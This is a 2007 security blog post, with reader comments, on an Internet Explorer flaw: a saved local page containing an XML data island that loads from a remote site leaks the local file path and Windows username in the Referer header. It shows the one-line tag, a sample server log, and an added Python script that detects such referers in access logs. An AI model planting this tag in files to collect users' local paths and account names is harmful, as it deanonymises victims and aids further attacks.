IE Sends Local Addresses in Referer Header
I’m not sure why it took me so long to get around to this, but I finally was able to test and verify that this works. In Internet Explorer, if you can get a user to save a file to disk and open it, it will disclose local drive information in the Referer header without using JavaScript. trev sent this one to me, and after some failed tests I got it working (still not quite sure why it didn’t work when I first tried it). Here’s the simple code:
<xml id="xml" src="http://my.site.com/"></xml>
Here’s a sample of what the log looked like when I tested it:
xxx.xxx.xxx.xxx - - [25/Mar/2007:20:58:29 -0700] "GET / HTTP/1.1" 200 2231 "file:///C:/Documents%20and%20Settings/RSnake/Desktop/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
As you can see, not only does this give away local address information, it also reveals sensitive details such as the user name and the location on the drive. That could easily be leveraged for further attacks, and to my knowledge there is no other way to do this without running JavaScript or some other active control. This completely fails in Firefox, as it doesn’t support XML data islands. Nice find, Trev!
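As an added example (not code from the original post), here is a small detection script a site operator could run over Apache combined-format access logs: it flags any request whose Referer is a file:// URL, which is exactly what the data-island trick above produces, and pulls out the leaked local path and Windows profile name. The log lines are constructed samples with placeholder IPs.

```python
import re
from urllib.parse import unquote, urlparse

# Constructed sample lines in Apache combined log format (placeholder IPs and
# timestamps, not copied from the original post's server).
SAMPLE_LOG = """\
203.0.113.10 - - [25/Mar/2007:20:58:29 -0700] "GET / HTTP/1.1" 200 2231 "file:///C:/Documents%20and%20Settings/RSnake/Desktop/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
203.0.113.11 - - [25/Mar/2007:21:00:01 -0700] "GET /index.html HTTP/1.1" 200 512 "http://example.org/" "Mozilla/5.0"
203.0.113.12 - - [25/Mar/2007:21:03:45 -0700] "GET / HTTP/1.1" 200 2231 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
203.0.113.13 - - [25/Mar/2007:21:05:12 -0700] "GET /img/bug.gif HTTP/1.1" 200 43 "file:///C:/Users/alice/Downloads/page.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
"""

# Apache "combined" format: ip ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Windows profile roots; the path component right after them is the account name.
PROFILE_ROOTS = ("documents and settings", "users")

def leaked_profile_user(path):
    """Return the Windows user name embedded in a profile path, or None if there is none."""
    parts = [p for p in path.split("/") if p]  # e.g. ['C:', 'Documents and Settings', 'RSnake', 'Desktop']
    for i, part in enumerate(parts[:-1]):
        if part.lower() in PROFILE_ROOTS:
            return parts[i + 1]
    return None

def find_file_referers(log_text):
    """Parse combined-format lines; return one record per request whose Referer is a file:// URL."""
    hits = []
    for line in log_text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than failing the whole scan
        ref = m.group("referer")
        if not ref.lower().startswith("file:"):
            continue
        # Decode %20 etc. and strip the leading slash so 'C:/...' reads as a local path.
        local_path = unquote(urlparse(ref).path).lstrip("/")
        hits.append({"ip": m.group("ip"), "request": m.group("req"),
                     "local_path": local_path, "user": leaked_profile_user(local_path)})
    return hits

if __name__ == "__main__":
    for h in find_file_referers(SAMPLE_LOG):
        print(f"{h['ip']} {h['request']!r} leaked {h['local_path']!r} (user: {h['user']})")
```

The same check can be turned into a server-side rule that refuses or simply does not log file:// referers, which removes the leaked path from your own logs but does not stop the browser from sending it.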
March 26th, 2007 at 4:37 am
I just wondered why one would use the xml tag to do it when there is something like background: url() in css.
But this obviously doesn’t work. The browser sends an empty referer after saving it to the hard disk. I tested it in Firefox, Opera and Konqueror (all Linux) and got the same result in all of them.
March 26th, 2007 at 7:12 am
Well, I just played some more with it and it seems that, at least in Firefox, the referer is dropped when making requests from an https page. Probably a similar mechanism doesn’t allow sending the referer header from local files.
March 26th, 2007 at 11:07 am
Nice find!
March 26th, 2007 at 2:32 pm
Hasn’t this existed for a while though? I only ask because I know of several sites that prevent pages from submitting forms after they’ve been saved locally, though I’m not sure whether they specifically rule out local areas, or whether it’s a general referer.
March 26th, 2007 at 7:39 pm
It’s probably the opposite. They require that the referrer exists and that it matches the website URL, and if it doesn’t then they bounce it.
March 29th, 2007 at 11:04 am
Hehe, I’ve seen that some years ago. I managed the for a female actor.
The funny thing was, that one man she knew as a friend, visited the page from his local startpage. The referrer was
c:\…..\NAME_OF_THE_FRIEND\Desktop\hotSluts.html
Well that was the end of the friendship ;).
October 16th, 2007 at 1:11 pm
Interesting technique, RSnake!
It’s an information leak in Internet Explorer.
In my tests, this method doesn’t work in IE 6, so it works only in IE 7.
October 16th, 2007 at 2:51 pm
I was hurried with my previous test. When I retested, IE 6 sends the referer with this method (with the xml tag). It’s just that my local web server was configured not to log referers :-). And I wrote my own script and confirmed that this method works.
So it works in both IE 6 and IE 7.
October 17th, 2007 at 6:37 am
Thanks for testing, MustLive. It’s a pretty sexy method in some ways - especially if you combine it with my webbug technique: http://ha.ckers.org/webbug.html